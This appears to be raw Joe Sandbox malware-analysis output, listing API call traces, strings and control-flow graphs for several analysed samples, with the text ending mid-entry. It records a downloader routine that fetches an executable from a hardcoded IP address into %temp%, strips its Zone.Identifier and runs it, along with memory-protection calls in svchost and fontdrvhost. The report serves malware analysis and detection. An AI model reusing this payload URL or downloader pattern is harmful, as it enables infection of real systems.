                                                                                                                                                                                                                                                    • Opcode ID: c327debb162007a99c24bd1dca74853362394a0f5877b7856e6e2d3adeb9b1b6
                                                                                                                                                                                                                                                    • Instruction ID: 64e82f7f25030e78eb079923bd04c415cac7e1d93e2ddb87befcc6aada490326
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c327debb162007a99c24bd1dca74853362394a0f5877b7856e6e2d3adeb9b1b6
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E61126B290010A7E776527796CC9DFF3A6CEE943A47248126F409D1101FE68CD01B273
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00F76520,00000000,00000001,00000000,?,?,00F7599B,?,00000000,00000000), ref: 00F76D7D
                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00F76520,00000000,00000001,00000000,?,?,00F7599B,?,00000000,00000000,?,?,?,00F75F3E,00000000), ref: 00F76D89
                                                                                                                                                                                                                                                      • Part of subcall function 00F76D4F: CloseHandle.KERNEL32(FFFFFFFE,00F76D99,?,00F76520,00000000,00000001,00000000,?,?,00F7599B,?,00000000,00000000,?,?), ref: 00F76D5F
                                                                                                                                                                                                                                                    • ___initconout.LIBCMT ref: 00F76D99
                                                                                                                                                                                                                                                      • Part of subcall function 00F76D11: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00F76D40,00F7650D,?,?,00F7599B,?,00000000,00000000,?), ref: 00F76D24
                                                                                                                                                                                                                                                    • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,?,00F76520,00000000,00000001,00000000,?,?,00F7599B,?,00000000,00000000,?), ref: 00F76DAE
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.1607370383.0000000000F41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607346800.0000000000F40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607414351.0000000000F79000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607441159.0000000000F89000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607476906.0000000000FB8000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607502312.0000000000FBA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607528367.0000000000FBC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_f40000_2779421088.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2744216297-0
                                                                                                                                                                                                                                                    • Opcode ID: 6445689a28d7384c752364951c38c017a7c7531096627bfb34bc952cff09c9be
                                                                                                                                                                                                                                                    • Instruction ID: 17d9f972e283fe6b16d502685278552dd217a366a468a0c6f93f9ce2895c2d88
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6445689a28d7384c752364951c38c017a7c7531096627bfb34bc952cff09c9be
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1FF09836910569BBCF225FE59C099E93F26EB493B1B058511FA1C95120C6728960BB91
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • EncodePointer.KERNEL32(00000000,?), ref: 00F6EC0B
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.1607370383.0000000000F41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607346800.0000000000F40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607414351.0000000000F79000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607441159.0000000000F89000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607476906.0000000000FB8000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607502312.0000000000FBA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.1607528367.0000000000FBC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_f40000_2779421088.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: EncodePointer
                                                                                                                                                                                                                                                    • String ID: MOC$RCC
                                                                                                                                                                                                                                                    • API String ID: 2118026453-2084237596
                                                                                                                                                                                                                                                    • Opcode ID: 966988dcc0e0035f130f4daabe9f754da6629a475b4ce01f2940da0b477bd7cf
                                                                                                                                                                                                                                                    • Instruction ID: 2d4c8f7cb7fd54368e4f642620b9b1c6d81cd7a29c048d15f1c76a394665648a
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 966988dcc0e0035f130f4daabe9f754da6629a475b4ce01f2940da0b477bd7cf
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AD416D76E00209AFCF15DF94CD81AEEBBB5FF48314F184059F904A7251D3359951EB51
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,00000000,?,?), ref: 02740326
                                                                                                                                                                                                                                                      • Part of subcall function 027400A4: VirtualAlloc.KERNELBASE(00000000,00001012,00001000,00000004), ref: 027400CD
                                                                                                                                                                                                                                                      • Part of subcall function 027400A4: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 02740279
                                                                                                                                                                                                                                                    • VirtualAlloc.KERNELBASE(00000000,00400000,00001000,00000004), ref: 02740378
                                                                                                                                                                                                                                                    • VirtualProtect.KERNELBASE(0000002C,?,00000040,?), ref: 027403E7
                                                                                                                                                                                                                                                    • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 02740407
                                                                                                                                                                                                                                                    • MapViewOfFile.KERNELBASE(?,00000004,00000000,00000000,00000000), ref: 0274042E
                                                                                                                                                                                                                                                    • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 02740456
                                                                                                                                                                                                                                                    • CloseHandle.KERNELBASE(?), ref: 02740471
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000A.00000003.1606319441.0000000002740000.00000040.00000001.00020000.00000000.sdmp, Offset: 02740000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_3_2740000_svchost.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Virtual$Alloc$Free$CloseFileHandleProtectView
                                                                                                                                                                                                                                                    • String ID: ,
                                                                                                                                                                                                                                                    • API String ID: 3867569247-3772416878
                                                                                                                                                                                                                                                    • Opcode ID: 35eb397ea14406336b01ea38f36e06f8461e94550e7b98cd084062937234d485
                                                                                                                                                                                                                                                    • Instruction ID: 6e138d80a7036b8221ef9f6177d194c2e43c0059ed96b007783e3738cbe50937
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 35eb397ea14406336b01ea38f36e06f8461e94550e7b98cd084062937234d485
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3B612DB5900209EFDB24DFA9C884EDEBBB9FF08354F54851AEA59A7240D730E950CF60
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • VirtualAlloc.KERNELBASE(00000000,00001012,00001000,00000004), ref: 027400CD
                                                                                                                                                                                                                                                    • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 02740279
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000A.00000003.1606319441.0000000002740000.00000040.00000001.00020000.00000000.sdmp, Offset: 02740000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_3_2740000_svchost.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Virtual$AllocFree
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2087232378-0
                                                                                                                                                                                                                                                    • Opcode ID: 7dc8e79fde86babc96161718fc4e5f80a5398d7d893a888eaa0e52eee754c683
                                                                                                                                                                                                                                                    • Instruction ID: c50aa7a0acbd5afb525541b077445bd609d580acdee92c2a34ee4062611f966e
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7dc8e79fde86babc96161718fc4e5f80a5398d7d893a888eaa0e52eee754c683
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BE719B71A04249DFDB45CF98C881BEEBBF0AB09314F244495E965FB281C734AA91CF64

                                                                                                                                                                                                                                                    Callgraph

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 007C10B9
                                                                                                                                                                                                                                                    • srand.MSVCR90 ref: 007C10C0
                                                                                                                                                                                                                                                    • DeleteUrlCacheEntryW.WININET(?), ref: 007C10CC
                                                                                                                                                                                                                                                    • ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 007C10EA
                                                                                                                                                                                                                                                    • rand.MSVCR90 ref: 007C10F0
                                                                                                                                                                                                                                                    • rand.MSVCR90 ref: 007C1104
                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 007C112B
                                                                                                                                                                                                                                                    • InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36,00000000,00000000,00000000,00000000), ref: 007C1141
                                                                                                                                                                                                                                                    • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 007C116D
                                                                                                                                                                                                                                                    • CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 007C119C
                                                                                                                                                                                                                                                    • InternetReadFile.WININET(00000000,?,00000103,?), ref: 007C11CF
                                                                                                                                                                                                                                                    • WriteFile.KERNELBASE(000000FF,?,00000000,?,00000000), ref: 007C1200
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(000000FF), ref: 007C120F
                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 007C1228
                                                                                                                                                                                                                                                    • DeleteFileW.KERNELBASE(?), ref: 007C1238
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(000000FF), ref: 007C1263
                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 007C1270
                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 007C127D
                                                                                                                                                                                                                                                    • Sleep.KERNELBASE(000001F4), ref: 007C1288
                                                                                                                                                                                                                                                    • rand.MSVCR90 ref: 007C129D
                                                                                                                                                                                                                                                    • Sleep.KERNEL32 ref: 007C12B4
                                                                                                                                                                                                                                                    • rand.MSVCR90 ref: 007C12BA
                                                                                                                                                                                                                                                    • rand.MSVCR90 ref: 007C12CE
                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 007C12F5
                                                                                                                                                                                                                                                    • DeleteUrlCacheEntryW.WININET(?), ref: 007C1302
                                                                                                                                                                                                                                                    • URLDownloadToFileW.URLMON(00000000,?,?,00000000,00000000), ref: 007C1319
                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 007C1335
                                                                                                                                                                                                                                                    • DeleteFileW.KERNEL32(?), ref: 007C1345
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    • %s\%d%d.exe, xrefs: 007C12E9
                                                                                                                                                                                                                                                    • %s\%d%d.exe, xrefs: 007C111F
                                                                                                                                                                                                                                                    • %temp%, xrefs: 007C10E5
                                                                                                                                                                                                                                                    • %s:Zone.Identifier, xrefs: 007C121C
                                                                                                                                                                                                                                                    • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36, xrefs: 007C113C
                                                                                                                                                                                                                                                    • %s:Zone.Identifier, xrefs: 007C1329
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.1777135939.00000000007C1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.1777112385.00000000007C0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.1777160846.00000000007C2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.1777184777.00000000007C4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_7c0000_78476062.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: File$Internetrand$CloseDeleteHandlewsprintf$CacheEntryOpenSleep$CountCreateDownloadEnvironmentExpandReadStringsTickWritesrand
                                                                                                                                                                                                                                                    • String ID: %s:Zone.Identifier$%s:Zone.Identifier$%s\%d%d.exe$%s\%d%d.exe$%temp%$Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
                                                                                                                                                                                                                                                    • API String ID: 3548267932-1161929716
                                                                                                                                                                                                                                                    • Opcode ID: 92436e855575cb7423ea0a8f66844b4ae0da445e24b07f7d515d5c6737006994
                                                                                                                                                                                                                                                    • Instruction ID: e6f14b9aafa8f068fd6c928ad25193a0a2c8f3cf9f41f75b110bc137390f4b04
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 92436e855575cb7423ea0a8f66844b4ae0da445e24b07f7d515d5c6737006994
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 116196B5A40218ABD724DB60DC49FE97379BB48701F44849DF609921D2DABCABC1CFA4

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 18 7c1000-7c1060 memset * 2 CreateProcessW 19 7c1071-7c1095 ShellExecuteW 18->19 20 7c1062-7c106f Sleep 18->20 22 7c10a6 19->22 23 7c1097-7c10a4 Sleep 19->23 21 7c10a8-7c10ab 20->21 22->21 23->21
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • memset.MSVCR90 ref: 007C100E
                                                                                                                                                                                                                                                    • memset.MSVCR90 ref: 007C101E
                                                                                                                                                                                                                                                    • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 007C1057
                                                                                                                                                                                                                                                    • Sleep.KERNELBASE(000003E8), ref: 007C1067
                                                                                                                                                                                                                                                    • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 007C1082
                                                                                                                                                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 007C109C
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.1777135939.00000000007C1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.1777112385.00000000007C0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.1777160846.00000000007C2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.1777184777.00000000007C4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_7c0000_78476062.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Sleepmemset$CreateExecuteProcessShell
                                                                                                                                                                                                                                                    • String ID: $D$open
                                                                                                                                                                                                                                                    • API String ID: 3787208655-2182757814
                                                                                                                                                                                                                                                    • Opcode ID: 9ea84508498a0b33631f982681277ec9f500aec90134b0348166df45f0945141
                                                                                                                                                                                                                                                    • Instruction ID: 380d1d813fe4ab1200f41570f7185c99ae2c55429ec6bdeae7f3ec10aa6231ec
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9ea84508498a0b33631f982681277ec9f500aec90134b0348166df45f0945141
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 47115471E80308FBE710DF90CC46FAD7778AB15B01F20411DFA086E2C2D6B95A85CB65

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 24 7c13c0-7c140b ExpandEnvironmentStringsW wsprintfW 26 7c140d-7c140f 24->26 27 7c1413-7c143c CreateFileW 24->27 28 7c144d-7c1450 26->28 29 7c143e-7c1445 CloseHandle 27->29 30 7c144b 27->30 29->30 30->28
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 007C13DA
                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 007C13F3
                                                                                                                                                                                                                                                    • PathFileExistsW.KERNELBASE(?), ref: 007C1403
                                                                                                                                                                                                                                                    • CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000001,00000002,00000000), ref: 007C1429
                                                                                                                                                                                                                                                    • CloseHandle.KERNELBASE(000000FF), ref: 007C1445
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.1777135939.00000000007C1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.1777112385.00000000007C0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.1777160846.00000000007C2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.1777184777.00000000007C4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_7c0000_78476062.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: File$CloseCreateEnvironmentExistsExpandHandlePathStringswsprintf
                                                                                                                                                                                                                                                    • String ID: %s\roapalr.jpg$%temp%$^Gv
                                                                                                                                                                                                                                                    • API String ID: 750032643-185382985
                                                                                                                                                                                                                                                    • Opcode ID: 4b36ca67c7791d2939c1648165110d1298ac216d1b3f773cf7467220a26e3afd
                                                                                                                                                                                                                                                    • Instruction ID: e6a3738c6f54ad57f9b03f0b719622f10be4595a3eb67d9e66196ffd53f09692
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4b36ca67c7791d2939c1648165110d1298ac216d1b3f773cf7467220a26e3afd
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B501A7B064031CABD730DB609C49FE57338AB44700F0085ADB719A20D3EAB85AC6DFA9

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 31 7c1360-7c13ab ExpandEnvironmentStringsW wsprintfW 33 7c13ad-7c13af 31->33 34 7c13b1 31->34 35 7c13b3-7c13b6 33->35 34->35
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • ExpandEnvironmentStringsW.KERNEL32(%systemdrive%,?,00000104), ref: 007C137A
                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 007C1393
                                                                                                                                                                                                                                                    • PathFileExistsW.KERNELBASE(?), ref: 007C13A3
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.1777135939.00000000007C1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.1777112385.00000000007C0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.1777160846.00000000007C2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.1777184777.00000000007C4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_7c0000_78476062.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: EnvironmentExistsExpandFilePathStringswsprintf
                                                                                                                                                                                                                                                    • String ID: %s\Program Files (x86)$%systemdrive%$^Gv
                                                                                                                                                                                                                                                    • API String ID: 3337111443-995220092
                                                                                                                                                                                                                                                    • Opcode ID: a20ff8feba44f5843c0ce4ae8aced50d4ac29fb4be638c2faad2ce3966a6d724
                                                                                                                                                                                                                                                    • Instruction ID: 9f170bfdc358e186a7a16c9a8e632c63c4e516ac9bebb29727beb5cf6895f4f3
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a20ff8feba44f5843c0ce4ae8aced50d4ac29fb4be638c2faad2ce3966a6d724
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4AE065B150021C6BDB10DB60AC49FE57328A701704F4086ADAA5991152FAB896DADBA9

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 36 7c1460-7c1478 Sleep call 7c1360 39 7c147a-7c1484 call 7c13c0 36->39 40 7c1493-7c1496 36->40 39->40 43 7c1486-7c148b call 7c10b0 39->43 45 7c1490 43->45 45->40
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • Sleep.KERNELBASE(000007D0), ref: 007C1468
                                                                                                                                                                                                                                                      • Part of subcall function 007C1360: ExpandEnvironmentStringsW.KERNEL32(%systemdrive%,?,00000104), ref: 007C137A
                                                                                                                                                                                                                                                      • Part of subcall function 007C1360: wsprintfW.USER32 ref: 007C1393
                                                                                                                                                                                                                                                      • Part of subcall function 007C1360: PathFileExistsW.KERNELBASE(?), ref: 007C13A3
                                                                                                                                                                                                                                                      • Part of subcall function 007C13C0: ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 007C13DA
                                                                                                                                                                                                                                                      • Part of subcall function 007C13C0: wsprintfW.USER32 ref: 007C13F3
                                                                                                                                                                                                                                                      • Part of subcall function 007C13C0: PathFileExistsW.KERNELBASE(?), ref: 007C1403
                                                                                                                                                                                                                                                      • Part of subcall function 007C10B0: GetTickCount.KERNEL32 ref: 007C10B9
                                                                                                                                                                                                                                                      • Part of subcall function 007C10B0: srand.MSVCR90 ref: 007C10C0
                                                                                                                                                                                                                                                      • Part of subcall function 007C10B0: DeleteUrlCacheEntryW.WININET(?), ref: 007C10CC
                                                                                                                                                                                                                                                      • Part of subcall function 007C10B0: ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 007C10EA
                                                                                                                                                                                                                                                      • Part of subcall function 007C10B0: rand.MSVCR90 ref: 007C10F0
                                                                                                                                                                                                                                                      • Part of subcall function 007C10B0: rand.MSVCR90 ref: 007C1104
                                                                                                                                                                                                                                                      • Part of subcall function 007C10B0: wsprintfW.USER32 ref: 007C112B
                                                                                                                                                                                                                                                      • Part of subcall function 007C10B0: InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36,00000000,00000000,00000000,00000000), ref: 007C1141
                                                                                                                                                                                                                                                      • Part of subcall function 007C10B0: InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 007C116D
                                                                                                                                                                                                                                                      • Part of subcall function 007C10B0: CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 007C119C
                                                                                                                                                                                                                                                      • Part of subcall function 007C10B0: InternetReadFile.WININET(00000000,?,00000103,?), ref: 007C11CF
                                                                                                                                                                                                                                                      • Part of subcall function 007C10B0: WriteFile.KERNELBASE(000000FF,?,00000000,?,00000000), ref: 007C1200
                                                                                                                                                                                                                                                      • Part of subcall function 007C10B0: CloseHandle.KERNEL32(000000FF), ref: 007C120F
                                                                                                                                                                                                                                                      • Part of subcall function 007C10B0: wsprintfW.USER32 ref: 007C1228
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    • http://185.215.113.84/nxmr.exe, xrefs: 007C1486
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.1777135939.00000000007C1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.1777112385.00000000007C0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.1777160846.00000000007C2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.1777184777.00000000007C4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_7c0000_78476062.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: File$wsprintf$EnvironmentExpandInternetStrings$ExistsOpenPathrand$CacheCloseCountCreateDeleteEntryHandleReadSleepTickWritesrand
                                                                                                                                                                                                                                                    • String ID: http://185.215.113.84/nxmr.exe
                                                                                                                                                                                                                                                    • API String ID: 4035879952-3066490085
                                                                                                                                                                                                                                                    • Opcode ID: 81c40b1101510f14292347b90868af69178175dee93d69745f4f7a16447cb7e7
                                                                                                                                                                                                                                                    • Instruction ID: f35e580005db832898fc289c939a83ba4657622f1df7dce5e86af5ea3af482ef
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 81c40b1101510f14292347b90868af69178175dee93d69745f4f7a16447cb7e7
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1CD0A7A5500395A1A10532B27C0BF3F33986D03781FC4843EB446C8883ED4CD50590B2

                                                                                                                                                                                                                                                    Callgraph

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000C.00000002.2099204640.00000270F6670000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000270F6670000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_270f6670000_fontdrvhost.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: AcceptCloseConnectHandlePort
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3811980168-0
                                                                                                                                                                                                                                                    • Opcode ID: c28fd07678fc221e1754ee083f118103e9e8097afeb12f13d48dc470bfa4e84b
                                                                                                                                                                                                                                                    • Instruction ID: f289e0753cfff43cbf418a9f887817d30438b68ed67ce59bdde49bdc090d208d
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c28fd07678fc221e1754ee083f118103e9e8097afeb12f13d48dc470bfa4e84b
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9E91A130508E088FDB74EB58D4857E5B3E1FB98314F14465EE48FC7696EE34A9468B82

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000C.00000002.2099204640.00000270F6670000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000270F6670000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_270f6670000_fontdrvhost.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: AcceptConnectPort
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1658770261-0
                                                                                                                                                                                                                                                    • Opcode ID: 275693e7d66e5d53f7e2184dfa7c88ce453f9d9d0d3e8ba4525500231a394657
